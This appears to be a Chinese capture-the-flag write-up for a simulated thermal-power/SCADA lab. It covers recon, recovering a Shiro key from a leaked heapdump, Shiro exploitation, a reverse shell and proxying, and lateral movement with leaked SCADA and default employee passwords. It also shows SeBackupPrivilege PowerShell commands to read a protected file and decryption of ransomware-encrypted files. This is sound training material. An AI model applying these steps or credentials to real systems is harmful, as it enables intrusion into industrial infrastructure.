春秋云镜-ThermalPower

外网

使用nmap扫描所给的web服务

image-20240714134403217

访问8080

image-20240714134451003

使用dirsearch扫描泄露文件

image-20240714134934556

确定是heapdump泄露 下载泄露文件

image-20240714135156293

分析得到shirokey

1
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES

shiro attack一把梭

image-20240714135335780

image-20240714135349224

得到flag1

image-20240714135425356

弹shell出来 搭建代理

image-20240714135815211

走代理的扫描有点问题 还是上传之后扫描

image-20240714141448245

172.22.17.6:21

存在一个ftp服务 可以匿名登录

1
proxychains ftp 172.22.17.6

连接很不稳定 直接使用浏览器访问

image-20240714142824089

在SCADA 得到一个用户密码

1
2
3
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

fscan扫描 查看

image-20240714143013331

注意到有一个内部员工通讯录和一个火创能源内部通知

image-20240714143210520

注意到初始账号密码格式 scada工程师只有这些

image-20240714143340836

也就是这些密码

1
2
3
4
5
6
7
8
9
10
chenhua/chenhua@0813
zhaoli/zhaoli@0821
wangning/wangning@0837
zhangling/zhangling@0871
zhangying/zhangying@0888
wangzhiqiang/wangzhiqiang@0901
chentao/chentao@0922
zhouyong/zhouyong@0939
lilong/lilong@1046
liyumei/liyumei@1048

尝试登录

1
chenhua/chenhua@0813

成功登录

image-20240714143856308

不过是低权限 需要提权到高权限

可惜不出网 没法直接用msf提权

image-20240714144424090

查看权限image-20240714150146895

需要提权 没啥思路 看看wp

注册表 SAM 转储

环境问题 我复现不成功

1
2
3
4
5
6
cd Desktop
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite

172.22.26.11

有账号密码 直接远程连接桌面

登上去开锅炉得到flag

image-20240714153904289

勒索加密文件

取出来里面几个被加密的文件

pem转成私钥SSL在线工具-RSA公私钥PEM转换XML-RSA公私钥XML转换PEM-在线RSA格式转换-SSLeye官网

image-20240714155504061

然后aes解密即可

image-20240714160449137

image-20240714160455178